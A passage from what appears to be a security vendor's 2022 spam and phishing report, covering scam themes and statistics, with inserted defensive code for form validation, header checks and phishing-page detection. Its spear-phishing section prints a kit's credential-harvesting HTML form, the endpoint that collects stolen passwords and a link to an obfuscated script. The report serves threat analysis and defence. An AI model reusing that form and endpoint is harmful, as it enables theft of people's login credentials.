Websites that offered tickets to the finals were another type of soccer-flavored bait. Scammers were betting on the finals typically being the most popular stage of the competition, tickets to which are often hard to get. Unlike legitimate ticket stores, the fake resellers were showing available seats in every sector even when the World Cup was almost over. A vast selection of available seats should have alarmed visitors: real tickets would have been largely gone.

Fake donation sites started popping up after the Ukraine crisis broke out in 2022, pretending to accept money as aid to Ukraine. These sites referenced public figures and humanitarian groups, offering to accept cash in cryptocurrency, something that should have raised a red flag in itself.

The pandemic

The COVID-19 theme had lost relevance by late 2022 as the pandemic restrictions had been lifted in most countries. At the beginning of that year, we still observed phishing attacks that used the themes of infection and prevention as the bait. For example, one website invited users to obtain a COVID vaccination certificate by entering their British National Health Service (NHS) account credentials. Others offered the coveted Green Pass without vaccination.

Scammers abused legitimate survey services by creating polls in the name of various organizations to profit from victims’ personal, including sensitive, data. In another COVID-themed scheme, the con artists introduced themselves as the Direct Relief charity, which helps to improve the quality of life and healthcare in poorer regions. Visitors were invited to fill out a form to be eligible for $750 per week in aid for twenty-six weeks. The survey page said the “charity” found the victim’s telephone number in a database of individuals affected by COVID-19. Those who wished to receive the “aid” were asked to state their full name, contact details, date of birth, social security and driver’s license numbers, gender, and current employer, attaching a scanned copy of their driver’s license. To lend an air of authenticity and to motivate the victim to enter valid information, the swindlers warned that the victim could be prosecuted for providing false information. The scheme likely aimed at identity theft: the illegal use of others’ personal details for deriving profit. The cybercrooks might also use the data to contact their victims later, staging a more convincing swindle.

Crypto phishing and crypto scams

The unabated popularity of cryptocurrency saw crypto scammers’ interest in wallet owners’ accounts growing, despite the fact that rates continued to drop throughout the year. Cybercriminals chased seed phrases, used for recovering access to virtual funds. By getting the user’s secret phrase, cybercriminals could get access to their cryptocurrency balance.

In a typical internet hoax manner, crypto scam sites offered visitors a chance to get rich quick by paying a small fee. Unlike common easy-money scams, these websites asked for payments in cryptocurrency — which they promised to give away and which they were trying to steal. The “giveaways” were timed to coincide with events that were directly or indirectly associated with cryptocurrency. Thus, one of the fake sites promised prizes on the occasion of Nvidia’s thirtieth anniversary (the company is a major vendor of graphics processing units, which are sometimes used for crypto mining). Promotion of cryptocurrency use was another pretext for the “giveaways”. Users were invited to deposit up to 100 cryptocurrency units for a promise to refund two times that amount, purportedly to speed up digital currency adoption. In reality, the scheme worked the way any other internet hoax would: the self-professed altruists went off the radar once they received the deposit.

Compensation, bonus, and paid survey scams

Bonuses and compensations are hard to deny in times of crisis and instability, but it is worth keeping in mind that “financial assistance” is frequently promised by con artists to swindle you out of your money.

“Promotional campaigns by major banks” were a popular bait in 2022. Visitors to a fraudulent web page were invited to receive a one-time payment or to take a service quality survey for a fee. Unlike the prizes offered in the aforementioned crypto schemes, these fees were smaller: an equivalent of $30–40. The cybercriminals used an array of techniques to lull victims’ vigilance: company logos, assurances that the campaigns were legit, as well as detailed, lifelike descriptions of the offer. Similar “campaigns” were staged in the name of other types of organizations, for example, the Polish finance ministry.

Aid as distributed by various governmental and nongovernmental organizations remained a popular fraud theme in 2022. For example, in Muslim countries, scammers promised to send charity packages, purportedly under a “Ramadan Relief” program that aimed at helping low-income families during the Ramadan fast. The fasting period typically sees higher prices for food and household products, while those observing the fast buy more than they normally do and may be faced with a shortage of money. Legitimate charities, such as WF-AID, do operate Ramadan relief programs, and judging by the screenshot below, the fraudsters were pretending to represent that organization. An eye-catching picture of the organization’s logo and huge boxes was accompanied by a list of foodstuffs included in the aid package, with positive “recipient feedback” posted below the message. The victim was asked to make sure that their name was on the list of recipients, so they could get a package. This required providing personal data on the website and sending a link to the scam site to instant messaging contacts—nothing extraordinary for hoaxes like this. This way, the scammers both populate their databases and have victims spread links to their malicious resources for them. In addition to that, they might ask the victim to cover the “shipping costs”.

Growing utility rates and an increase in the price of natural resources have prompted several governments to start discussing compensations for the population. Payout notices could arrive by mail, email, or as a text message. Cybercriminals attempted to take advantage of the situation by creating web pages that mimicked government websites, promising cash for covering utility payments or compensation of utility expenses. Visitors were occasionally asked to provide personal details under the pretext of checking that they were eligible, or simply to fill out a questionnaire. In Britain, con artists posing as a government authority promised to compensate electricity costs. The description of the one-time payout was copied from the official website of the authority, which did offer that type of compensation. After completing the questionnaire, the victim was asked to specify the electric utility whose services they were using and enter the details of the bank card linked to their account with the utility. The promise of £400 was supposed to make the victim drop their guard and share their personal information.

In Singapore, scammers offered a refund of water supply costs, purportedly because of double billing. An energy or resource crisis was not used as a pretext in this particular case, but refunds were still offered in the name of the water supply authority.

Fake online stores and large vendor phishing

We see fake websites that imitate large online stores and marketplaces year after year, and 2022 was no exception. Phishing attacks targeted both the customers of globally known retailers and regional players. An attack often started with the victim receiving a link to a certain product supposedly offered at an attractive price, by email, in an instant messaging app, or on a social network. Those who fell for the trick could lose access to their accounts, have their bank card details stolen, or waste the money they wanted to spend on the dirt-cheap item.

“Insider tips” about “private sales” were also used as a lure. Thus, a web page that copied the appearance of a Russian marketplace promised discounts of up to 90% on all items listed on it. The page design did look credible, with the only potential red flags being really low prices and the URL in the address bar not matching the official one.

Many large vendors, notably in the home appliances segment, announced in early spring that they would be pulling out of Russia, which caused a spike in demand. This was reflected in the threat landscape, with fake online stores offering home appliances popping up all over the Russian segment of the internet (also called Runet). Large retailers being out of stock, combined with unbelievably low prices, made these offers especially appealing. The risk associated with making a purchase was to lose a substantial amount of money and never to receive what was ordered.

Hijacking of social media accounts

Users of social media have increasingly focused on privacy lately. That said, curiosity is hard to contain: people want to check out who has been following them, but do so without the other party knowing. Cybercriminals who were after their account credentials offered victims a way to have their cake and eat it too, via some new social media capability. A fake Facebook Messenger page promised to install an update that could change the user’s appearance and voice during video calls, and track who has been viewing their profile, among other features. To get the “update”, the victim was asked to enter their account credentials, which the scammers immediately took over.

Many Instagram users dream about the Blue Badge, which stands for verified account and is typically reserved for large companies or media personalities. Cybercriminals decided to take advantage of that exclusivity, creating phishing pages that assured visitors their verified status had been approved and all they needed to do was to enter their account logins and passwords.

Russia blocked access to both Facebook and Instagram in March 2022, which led to the popularity of Russian social networks and Telegram skyrocketing. This increased usage meant the users’ risk of losing personal data was now higher, too. “Well-wishers” who operated scam sites offered to check if Russian social media contained any embarrassing materials on the victim. The scam operators told the users it was possible to find damaging information about every third user of a social network by running a search. If the user agreed to have a search run for them, they were told that a certain amount of dirty linen indeed had been found. In reality, there was no search — the scammers simply stole the credentials they requested for the check.

One of the added risks of social media phishing is scammers getting access to both the social media account itself and any linked services.

The Telegram Premium status provides a range of benefits, from an ad-free experience to the ability to block incoming voice messages, but the subscription costs money. Scammers offered to “test” a Premium subscription free of charge or simply promised to give one for free if the victim entered their Telegram user name and password or a verification code sent by the service, which was exactly what the cybercrooks were after.

One more phishing campaign targeting Telegram users was arranged to coincide with the New Year’s celebration. Scammers created a page on the telegra.ph blogging platform that posted a gallery of children’s drawings, encouraging users to vote for their favorites. Scammers sent a link to that page from hacked accounts, asking users to vote for their friends’ kids’ works. Those who took the bait were directed to a fake page with a login form on it. The cybercriminals were betting on users going straight to voting, without checking the authenticity of the drawings, which had been copied from various past years’ competition pages, as requests to vote for one’s friends’ kids are common before public holidays.

The Telegram auction platform named Fragment went live in October 2022: it was selling unique usernames. You can become a user by linking your Telegram account or TON wallet. Scammers who were after those account details sent out links to fake Fragment pages. A visitor who tried to buy a username from the fake website was requested to log in. If the victim entered their credentials, the scam operators immediately grabbed those.

Spam in 2022

The pandemic

Unlike phishing, COVID-themed spam is still a thing. Most of that is “Nigerian-type” scams: millionaires dying from COVID bequeathing their money to treatment and prevention efforts, and to improve the lives of those who have recovered, or Mark Zuckerberg running a special COVID lottery where one can win a million euros even if they are not a Facebook user. Recipients are told that they could claim some IMF money left unallocated because of the pandemic. Others are offered hefty amounts under an anti-recession assistance program.

The amount of spam exploiting the coronavirus theme in some way dropped noticeably during 2022: at the beginning of the year, we were blocking a million of these emails per month, but the figure had shrunk threefold by year-end.

Contact form spam

The year 2022 saw cybercriminals abuse contact forms for spam more frequently. In a typical scheme of this kind, scammers find websites that offer registration, contact, or support request forms that do not require the user to be logged in to submit, and do not check the data entered. In some cases, they insert a scam message with a hyperlink in the login or name fields, and in others, add a longer text with images to the message field. Then the attackers add victims’ email addresses to the contact fields and submit. When getting a message via a registration or contact form, most websites reply to the user’s email address that their request was received and is being processed, their account has been created, and so on. As a result, the person gets an automated reply from an official address of a legitimate organization, containing unsolicited advertisements or a scam link.
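One way a site owner can close the loophole just described, added here as an example (not the article’s or any vendor’s code): reject submissions whose name-type fields carry links or markup, and build the confirmation email so that it never echoes user-supplied text. The field names, the URL regex and the sample submissions are assumptions.

```python
"""Stop a contact form from relaying spam through its own auto-reply.

Added example, not from the article. Two defences: (1) validation that rejects
links and markup in fields that should hold a name, and (2) an auto-reply whose
subject and body are fixed, so nothing the submitter typed is reflected back.
"""
import re

# Anything that looks like a link or a bare domain in a name-type field is a red flag.
URL_RE = re.compile(r"https?://|www\.|\b[a-z0-9-]+\.(?:com|net|org|ru|xyz|fun|io)\b", re.I)
TAG_RE = re.compile(r"<[^>]+>")
MAX_NAME_LEN = 64
NAME_FIELDS = ("name", "login", "company")   # assumed field names


def validate_submission(fields: dict) -> list:
    """Return the reasons a submission should be rejected; an empty list means accept."""
    problems = []
    for key in NAME_FIELDS:
        value = fields.get(key, "")
        if len(value) > MAX_NAME_LEN:
            problems.append(f"{key}: too long ({len(value)} chars)")
        if URL_RE.search(value):
            problems.append(f"{key}: contains a link")
        if TAG_RE.search(value):
            problems.append(f"{key}: contains markup")
    # The free-text message may legitimately contain links, but embedded
    # images or other markup (the "longer text with images" variant) is not expected.
    if TAG_RE.search(fields.get("message", "")):
        problems.append("message: contains markup")
    return problems


def build_auto_reply(fields: dict, ticket_id: str) -> dict:
    """Compose the confirmation email without echoing any user-supplied text.

    Only the destination address comes from the form; subject and body are fixed,
    so a scam link planted in the name field can never reach the recipient.
    """
    return {
        "to": fields["email"],
        "subject": f"We received your request [{ticket_id}]",
        "body": ("Thank you for contacting us. Your request has been registered "
                 f"as ticket {ticket_id}. We will reply within two business days."),
    }


def process_submission(fields: dict, ticket_id: str):
    """Validate first; return (auto_reply, []) on success or (None, problems) on rejection."""
    problems = validate_submission(fields)
    if problems:
        return None, problems
    return build_auto_reply(fields, ticket_id), []


# Constructed samples: the first mimics the VAT-refund relay scheme described above.
SCAM_SUBMISSION = {
    "name": "VAT refund of $4200 approved, claim at http://refund-example.test/claim",
    "email": "victim@example.org",  # the scammer enters the victim's address, not their own
    "message": "",
}
LEGIT_SUBMISSION = {
    "name": "Anna Ivanova",
    "email": "anna@example.org",
    "message": "Please call me back about order 123.",
}

if __name__ == "__main__":
    for sample in (SCAM_SUBMISSION, LEGIT_SUBMISSION):
        reply, problems = process_submission(sample, "T-0001")
        print("rejected:" if reply is None else "accepted:", problems or reply["to"])
```

Adding a CAPTCHA or rate limit on the form is still worthwhile; the point of the fixed-template reply is that even a submission that gets through cannot turn the site into a spam relay.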

Most scam messages offer a compensation or prize to the recipient. For example, a spam email targeting Russian users promised an equivalent of $190–4200 in VAT refunds. To get the money, the victim was told to open the link in the message. This scheme is a classic: a linked web page requests that the user pay a commission of under a dozen dollars, which is insignificant in comparison to the promised refund. We observed many varieties of contact form money scam: from fuel cards to offers to make money on some online platform.

Scammers took advantage of forms on legitimate sites all around the world. Where spam email in Russian typically played on “prizes” or “earning money”, messages in other languages, in addition to offering “prizes”, encouraged users to visit “dating sites” — in fact, populated by bots — where the victims would no doubt be asked to pay for a premium account.

We blocked upward of a million scam emails sent via legitimate forms in 2022.

Blackmail in the name of law enforcement agencies

Extortion spam is nothing new. In such emails, attackers usually claim that the recipient has broken the law and demand money. In 2022, these mailings not only continued, but also evolved. For example, there was virtually no text in the messages: the user was either asked to open an attached PDF file to find out more, or they received threats in the form of an image with text. In addition, the geography of mailings widened in 2022.

The essence of the message, as in similar emails sent earlier, was that a criminal case was going to be opened against the recipient due to allegedly visiting sites containing child pornography.

To avoid serious consequences, the attackers urged the victim to respond as soon as possible to the sender and “settle the matter”. Most likely, the scammers would ask for a certain amount of money to be paid in further correspondence for the victim’s name to be removed from the “criminal case”. In 2022, we blocked over 100,000 blackmail emails in various countries and languages, including French, Spanish, English, German, Russian and Serbian.

Exploiting the news

Spammers constantly use major world events in their fraudulent schemes. The 2022 geopolitical crisis was no exception. Throughout the year, we saw mailings aimed at English-speaking users proposing transferring money, usually to a Bitcoin wallet, to help the victims of the conflict in Ukraine. Scammers often demand the transfer of money to Bitcoin wallets, as it is more difficult to trace the recipient through cryptocurrency transactions than through bank transactions. Blackmail demanding payment in cryptocurrency used to prevail in spam. Now, attackers have started collecting Bitcoin for charity.

The news agenda was also used in other scam mailings. For example, in early July, our solutions blocked 300,000 emails where fraudsters were requesting help on behalf of a Russian millionaire, who allegedly wanted to invest money and avoid sanctions. Another mailing said that the European Commission had decided to give away a fund created by Russian oligarchs, and the email recipient might be lucky to get a piece of this pie.

More and more “business offers” are appearing among spam mailings, and they exploit the current information agenda. Due to economic sanctions in 2022, enterprising businessmen offered replacements for goods and services from suppliers who left the Russian market. For example, spammers actively advertised services of a company transporting people to Russia. The email text emphasized the fact that many transport companies refused to provide such services.

There were also spam mailings where various companies offered to replace popular international software with Russian equivalents or solutions developed in third countries. In addition, there were spam propositions for intermediary services to open a company or bank account in neighboring countries, such as Armenia, as well as offers of assistance in accepting payments from foreign partners.

The shortage of printer paper in Russia in March and April 2022 spawned a wave of related ads offering paper at discount prices.

Spammers in 2022 also actively marketed their promotional mailing services as alternative advertising to unavailable promotion via platforms such as Instagram. For example, in April we blocked around a million such mailings.

Against the backdrop of sanctions and the accompanying disruption of supply chains, there has been an increase in spam offering goods and services from Chinese suppliers. In 2022, our filter blocked more than 3.5 million emails containing such offers, and the number of them was growing, from around 700,000 in the first quarter to more than a million in the fourth.

Spam with malicious attachments

Employees shifting to remote work during the pandemic and the associated growth of online communications spurred the active development of various areas of phishing, both mass and targeted. Attackers have become more active in imitating business correspondence, not only targeting HR specialists and accountants, as before the pandemic, but also employees in other departments. In 2022, we saw an evolution of malicious emails masquerading as business correspondence. Attackers actively used social engineering techniques in their emails, adding signatures with logos and information from specific organizations, creating a context appropriate to the company’s profile, and applying business language. They also actively exploited the current news agenda and mentioned real employees from the company supposedly sending the emails. Spammers faked their messages as internal company correspondence, business correspondence between different organizations, and even as notifications from government agencies.

Masking malicious emails as business correspondence has become a major trend in malicious spam in 2022. Attackers tried to convince the recipient that it was a legitimate email, such as a commercial offer, a request for the supply of equipment, or an invoice for the payment of goods. For example, throughout the year, we encountered the following scheme. Attackers gained access to real business correspondence (most likely by stealing correspondence from previously infected computers) and sent malicious files or links to all of its participants in response to the previous email. This trick makes it harder to keep track of malicious emails, and the victim is more likely to fall for it.

In most cases, either the Qbot Trojan or Emotet was loaded when the malicious document was opened. Both can be used to steal user data, collect information about the corporate network, and spread additional malware, such as ransomware. Qbot can also be used to access and steal emails for use in further attacks.

Mailings imitating notifications from various ministries and other government organizations have become more frequent in the Runet. Emails were often designed to take into account the specific activities of the organizations they were pretending to be. The sender’s addresses copied the logic of email addresses in the relevant agencies, and the malicious attachment was disguised as some kind of specialized document, such as “key points of the meeting”. For example, malicious code was found in one of these mailings that exploited a vulnerability in the Equation Editor module, the formula editor in Microsoft Office.

The perpetrators did not ignore the news agenda. In particular, the malware was distributed under the guise of call-up “as part of partial mobilization” or as a “new solution” to safeguard against possible threats on the internet “caused by hostile organizations”.

In the second case, the program installed on the victim’s computer was in fact a crypto-ransomware Trojan.

Two-stage spear phishing using a known phish kit

In 2022, we saw an increase in spear (or targeted) phishing attacks targeting businesses around the world. In addition to typical campaigns consisting of one stage, there were attacks in several stages. In the first email, scammers posing as a potential client asked the victim to provide information about its products and services. Once the victim responded to this email, the attackers started the phishing attack.

Key facts:

  • Attackers use fake Dropbox pages created using a well-known phishing kit
  • The campaign targets the sales departments of manufacturers and suppliers of goods and services
  • Attackers use SMTP IP addresses and From domains provided by Microsoft Corporation and Google LLC (Gmail)

Statistics

The campaign began in April 2022, with malicious activity peaking in May, and ended by June.

Number of emails related to a two-step targeted campaign detected by Kaspersky solutions

How a phishing campaign unfolds

Attackers send an email in the name of a real trade organization requesting more information about the victim company’s products. The email text looks plausible and has no suspicious elements, such as phishing links or attachments. A sender’s email address from a free domain, like gmail.com, may raise doubts. The email on the screenshot below is sent from an address in this domain, and the company name in the From field is different from the name in the signature.

Example of the first email

It is worth noting that the use of free domains is not typical for spear phishing in the name of organizations, because such domains are rarely used in business. Most often in targeted attacks, attackers either use spoofing of the legitimate domain of the organization they are pretending to be, or register domains similar to the original one. In addition, Google and Microsoft are pretty quick in blocking email addresses spotted sending spam. This is the most likely reason why attackers used different addresses in the From header (where the email came from) and Reply-to header (where the reply will go when clicking “Reply” in your email client). This means the victim responds to another address, which may be located in another free domain, such as outlook.com. The address in the Reply-to header is not used for spam, and correspondence with it is initiated by the victim, so it is less likely to be blocked quickly.
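A header check for the From/Reply-To pattern described above, added here as an example (not Kaspersky’s detection logic). It parses the raw headers with the standard library and scores the combination of a mismatched Reply-To with free-mail domains on either side; the free-mail list and the two sample messages are constructed.

```python
"""Flag messages whose replies are routed to an address other than the sender's.

Added example, not Kaspersky's code. In the campaign above the lure came from one
free-mail address while Reply-To pointed at another, so that blocking the sender
would not cut off the conversation the victim was about to start.
"""
from email import message_from_string
from email.utils import parseaddr

# Free-mail domains; gmail.com and outlook.com are the ones named in the article.
FREE_MAIL_DOMAINS = {"gmail.com", "outlook.com", "hotmail.com", "yahoo.com"}


def _domain(header_value: str) -> str:
    """Lower-cased domain part of the first address in a header, or '' if none."""
    _display_name, addr = parseaddr(header_value)
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def analyze_reply_to(raw_message: str) -> dict:
    """Return From/Reply-To findings and a simple risk score for one raw message.

    Score: +2 if Reply-To exists and its domain differs from From,
           +1 if From is a free-mail domain,
           +1 if the mismatched Reply-To is also a free-mail domain.
    A mailing list that sets Reply-To to the list address scores at most 2,
    so the threshold of 3 keeps that common legitimate case out.
    """
    msg = message_from_string(raw_message)
    from_domain = _domain(msg.get("From", ""))
    reply_domain = _domain(msg.get("Reply-To", ""))
    findings = {
        "from_domain": from_domain,
        "reply_to_domain": reply_domain,
        "reply_to_mismatch": bool(reply_domain) and reply_domain != from_domain,
        "from_freemail": from_domain in FREE_MAIL_DOMAINS,
        "reply_to_freemail": reply_domain in FREE_MAIL_DOMAINS,
    }
    score = 0
    if findings["reply_to_mismatch"]:
        score += 2
    if findings["from_freemail"]:
        score += 1
    if findings["reply_to_mismatch"] and findings["reply_to_freemail"]:
        score += 1
    findings["score"] = score
    findings["suspicious"] = score >= 3
    return findings


# Constructed sample in the shape of the first-stage lure described above.
SAMPLE_LURE = """\
From: Procurement Team <procurement.example-trade@gmail.com>
Reply-To: <exampletrade.orders@outlook.com>
To: sales@victim.example
Subject: Request for quotation

Hello, please send your product catalogue and current price list.
"""

# Constructed sample of ordinary business mail with no Reply-To header.
SAMPLE_LEGIT = """\
From: Jane Doe <jane.doe@partner.example>
To: sales@victim.example
Subject: Re: order 1234

Thanks, confirmed.
"""

if __name__ == "__main__":
    for raw in (SAMPLE_LURE, SAMPLE_LEGIT):
        print(analyze_reply_to(raw))
```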

After victims respond to a first email, attackers send a new message, asking them to go to a file-sharing site and view a PDF file with a completed order, which can be found via the link.

An email with a phishing link

By clicking the link, the user is taken to a fake site generated by a well-known phishing kit. It is a fairly simple tool that generates phishing pages to steal credentials from specific resources. Our solutions blocked fake WeTransfer and Dropbox pages created with this kit.

A fake WeTransfer page created using the same phish kit as the target campaign sites

In the phishing campaign described above, the phishing site mimics a Dropbox page with static file images and a download button. After clicking any element of the interface, the user is taken to a fake Dropbox login page that requests valid corporate credentials.

A fake Dropbox page

Login page with a phishing form

When victims attempt to log in, their usernames and passwords are sent to https://pbkvklqksxtdrfqkbkhszgkfjntdrf[.]herokuapp[.]com/send-mail.

<form name="loginform">
  <div class="form-group">
    <label for="">Email Address</label>
    <input type="email" id="email" class="form-control" name="email" placeholder="email Address">
    <div class="email-error"></div>
  </div>
  <div class="form-group">
    <label for="">Password</label>
    <input type="password" id="password" class="form-control" name="password" placeholder="Password">
    <div class="password-error"></div>
  </div>
  <div class="form-group btn-area">
    <button class="download-btn" id="db" type="submit">Download</button>
  </div>
</form>
</div>
<script src="https://firebasestorage.googleapis.com/v0/b/linktopage-c7fd6.appspot.com/o/obfuscated.js?alt=media&amp;token=1bb73d28-53c8-4a1e-9b82-1e7d62f3826b"></script>

HTML representation of a phishing form
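A page-level heuristic for spotting a credential-harvesting form like the one above, added as an example (not Kaspersky’s code and not the phish kit’s). It parses the HTML, notes a password form with no action attribute (submission left to a script, as in the kit), flags scripts loaded from hosts other than the page’s own, and compares any brand named on the page with the host serving it. The brand-to-host mapping and both sample pages are constructed.

```python
"""Heuristic scan of a fetched page for a brand-impersonating login form.

Added example, not from the article or the phishing kit. Signals combined:
a form with a password field, a named brand whose real host does not match the
serving host, and scripts pulled from third-party hosts (the kit above loaded
an obfuscated script from file storage rather than from the page's own origin).
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Brand keyword -> legitimate site. Constructed mapping; extend as needed.
BRAND_HOSTS = {"dropbox": "dropbox.com", "wetransfer": "wetransfer.com"}


class FormScanner(HTMLParser):
    """Collect password forms (with their action), script hosts and visible text."""

    def __init__(self):
        super().__init__()
        self.in_form = False
        self.form_has_password = False
        self.form_action = ""
        self.password_forms = []   # action attribute of every form holding a password field
        self.script_hosts = []
        self.text_chunks = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.in_form = True
            self.form_has_password = False
            self.form_action = a.get("action") or ""
        elif tag == "input" and self.in_form and (a.get("type") or "").lower() == "password":
            self.form_has_password = True
        elif tag == "script" and a.get("src"):
            self.script_hosts.append((urlparse(a["src"]).hostname or "").lower())

    def handle_endtag(self, tag):
        if tag == "form" and self.in_form:
            if self.form_has_password:
                self.password_forms.append(self.form_action)
            self.in_form = False

    def handle_data(self, data):
        self.text_chunks.append(data.lower())


def _same_site(host: str, site: str) -> bool:
    return host == site or host.endswith("." + site)


def assess_page(html: str, page_host: str) -> dict:
    """Return findings and a 'suspicious' verdict for one page served from page_host."""
    scanner = FormScanner()
    scanner.feed(html)
    page_host = page_host.lower()
    text = " ".join(scanner.text_chunks)
    brands = [b for b in BRAND_HOSTS if b in text]
    brand_mismatch = [b for b in brands if not _same_site(page_host, BRAND_HOSTS[b])]
    foreign_scripts = [h for h in scanner.script_hosts if h and not _same_site(h, page_host)]
    # No action attribute: a script decides where the credentials go.
    actionless = [act for act in scanner.password_forms if not act]
    findings = {
        "password_forms": len(scanner.password_forms),
        "brands_named": brands,
        "brand_host_mismatch": brand_mismatch,
        "foreign_script_hosts": foreign_scripts,
        "actionless_password_forms": len(actionless),
    }
    findings["suspicious"] = (bool(scanner.password_forms) and bool(brand_mismatch)
                              and bool(foreign_scripts or actionless))
    return findings


# Constructed sample with the same structure as the kit's page (no real kit markup or URLs).
FAKE_PAGE = """<html><head><title>Dropbox - Download</title>
<script src="https://storage.example-cdn.test/o/obfuscated.js"></script></head>
<body><h1>Sign in to Dropbox to download the order</h1>
<form name="loginform">
  <input type="email" name="email"><input type="password" name="password">
  <button type="submit">Download</button></form></body></html>"""

# Constructed sample of a login page served by the brand's own site.
REAL_PAGE = """<html><head><title>Dropbox login</title>
<script src="https://www.dropbox.com/static/app.js"></script></head>
<body><form action="/login"><input type="password" name="password"></form></body></html>"""

if __name__ == "__main__":
    print(assess_page(FAKE_PAGE, "share-files-example.test"))
    print(assess_page(REAL_PAGE, "www.dropbox.com"))
```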

Victims

We have identified targets for this campaign around the world, including the following countries: Russia, Bosnia and Herzegovina, Singapore, USA, Germany, Egypt, Thailand, Turkey, Serbia, Netherlands, Jordan, Iran, Kazakhstan, Portugal, and Malaysia.

Statistics: spam

Share of spam in mail traffic

In 2022, an average of 48.63% of emails worldwide were spam, representing a 3.07 p.p. increase on 2021. Over the course of the year, however, the share of spam in global email traffic has gradually declined, from 51.02% in the first quarter to 46.16% in the fourth.

Share of spam in global email traffic, 2022

The most active month in terms of spam was February 2022, with junk traffic accounting for 52.78% of all email correspondence. June was in second place (51.66%). December was the calmest: only 45.20% of emails in this month were spam.

On Runet, the proportion of spam in email traffic is generally higher than worldwide. In 2022, an average of 52.44% of emails were junk mailings. At the same time, the trend for a gradual shift in ratio in favor of legitimate correspondence can also be seen. We saw the largest share of spam in Runet in the first quarter, with 54.72% of all emails, and by the fourth quarter it had dropped to 49.20%.

Proportion of spam in Runet email traffic, 2022

Even though the second quarter (53.96%) was quieter in terms of spam than the first, the most active month in the Russian segment of the internet was June (60.16%). Most likely, the share of spam in June, both in Russia and globally, was influenced by the surge in mailings with offers from Chinese factories that we observed in that month. And the quietest month in Runet was December (47.18%), the same as globally.

Countries and territories — sources of spam

In 2022, the share of spam from Russia continued to grow, from 24.77% to 29.82%. Germany (5.19%) swapped places with mainland China (14.00%), whose share increased by 5.27 percentage points. Third place is still held by the United States (10.71%).

TOP 20 countries and territories — sources of spam, 2022

The Netherlands remained in fifth place (3.70%), its share decreased compared to 2021. Sixth and seventh places went to Japan (3.25%) and Brazil (3.18%), whose shares rose by 0.89 and 3.77 p.p., respectively. Next come the UK (2.44%), France (2.27%) and India (1.82%).

Malicious mail attachments

In 2022, our Mail Anti-Virus detected 166,187,118 malicious email attachments. That’s an increase of 18 million from the previous year. This component caused most triggers in March, May, and June 2022.

Number of Mail Anti-Virus hits, January — December 2022

The most common malicious email attachments in 2022, as in 2021, were Agensla Trojan stealers (7.14%), whose share decreased slightly. Noon spyware (4.89%) moved up to second place, and Badun Trojans (4.61%) spreading as archived electronic documents moved down to third place. Fourth place went to exploits for CVE-2018-0802 (4.33%) in Microsoft Equation Editor. In 2022, attackers used them significantly more often than exploits for CVE-2017-11882 in the same component (1.80%). The latter vulnerability was more widespread in 2021 and has now dropped to tenth place.

TOP 10 malware families spread by email attachments in 2022

ISO Trojans (3.27%), sent in the form of disk images, moved up to number five, and the sixth most common was the Guloader downloader family (2.65%), which delivers remotely controlled malware to victims’ devices. They are closely followed by the Badur family (2.60%), PDF files containing links to web resources with questionable content, and in eighth place is the infamous Emotet botnet (2.52%). Law enforcement shut this down in early 2021, but by fall, attackers had restored the infrastructure and were actively distributing it in 2022. More recently, Emotet has been used to deliver other malware to victims’ devices, particularly ransomware. The ninth most popular family was Taskun (2.10%), which creates malicious tasks in the task scheduler.

TOP 10 types of malware spread by email attachments in 2022

The list of the most common malware sent via email usually corresponds to the list of families. As in 2021, attackers mostly distributed the same instances from the TOP 10 families.

Countries and territories targeted by malicious mailings

Spain remains the leader in terms of blocked malicious attachments in 2022 (8.78%), which is a slight decrease compared to 2021 (9.32%). The share of Russia (7.29%), on the other hand, increased slightly. Third place went to Mexico (6.73%), and fourth place to Brazil (4.81%), whose share was virtually unchanged from the previous reporting period.

TOP 20 countries and territories targeted by malicious mailings, 2022 (download)

In Italy, 4.76% of all detected malicious attachments were blocked in 2022. The country is followed by Vietnam (4.43%) and Turkey (4.31%). The percentage of Mail Anti-Virus detections on computers of users from Germany (3.85%) continued to decrease. The share in the United Arab Emirates (3.41%) also decreased slightly, dropping to ninth place, while Malaysia (2.98%) remained in tenth place.

Statistics: phishing

In 2022, the number of phishing attacks increased markedly. Our Anti-Phishing system prevented 507,851,735 attempts to follow a phishing link, roughly double the number in 2021.

Map of phishing attacks

In 2022, the geography of phishing attacks changed dramatically. Attempts to click phishing links were most often blocked on devices from Vietnam (17.03%). In 2021, this country was not among the TOP 10 most attacked countries and territories. Macau is in second place (13.88%), also absent from last year’s ranking. Madagascar is in third place (12.04%), which was seventh in 2021. In addition to Vietnam and Macau, Algeria (11.05%), Malawi (10.91%) and Morocco (10.43%) appeared at the top of the list of most attacked countries and territories. Ecuador (11.05%) moved up to fifth place, while Brunei (10.59%) dropped one place to seventh. Brazil (10.57%) and Portugal (10.33%) moved from first and third places to eighth and tenth, respectively, and France, which was second in 2021, left the TOP 10.

TOP 10 countries and territories by share of attacked users:

Country/territory Share of attacked users*
Vietnam 17.03%
Macau 13.88%
Madagascar 12.04%
Algeria 11.05%
Ecuador 11.05%
Malawi 10.91%
Brunei 10.59%
Brazil 10.57%
Morocco 10.43%
Portugal 10.33%

* Share of users encountering phishing out of the total number of Kaspersky users in that country/territory, 2022

Top-level domains

As in previous years, the majority of phishing pages were hosted in the COM domain zone, but its share almost halved, from 31.55% to 17.69%. The XYZ zone remained in second place (8.79%), its share also having decreased. The third most popular domain among attackers was FUN (7.85%), which had not previously received their attention. The domain is associated with entertainment content, which is perhaps what attracted fraudsters to it.

Most frequent top-level domains for phishing pages in 2022 (download)

Domains ORG (3.89%) and TOP (1.80%) swapped places relative to 2021 but remained in fourth and fifth places. The rest of the top ten domain zones most in demand among cybercriminals were RU (1.52%), COM.BR (1.13%), DE (0.98%), CO.UK (0.98%) and SE (0.92%).

Organizations under phishing attacks

The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers. The component detects all pages with phishing content that the user has tried to open by following a link in an email message or on the web, as long as links to these pages are present in the Kaspersky database.

In 2022, pages impersonating delivery services had the highest percentage of clicks on phishing links blocked by our solutions (27.38%). Online stores (15.56%), which were popular with attackers during the pandemic, occupied second place. Payment systems (10.39%) and banks (10.39%) ranked third and fourth, respectively.

Distribution of organizations targeted by phishers, by category, 2022 (download)

The share of global internet portals (8.97%) almost halved, with almost as many phishing resources targeting users of smaller web services (8.24%). Social networks (6.83%), online games (2.84%), messengers (2.02%) and financial services (1.94%) complete the TOP 10 categories of sites of interest to criminals.

Hijacking Telegram accounts

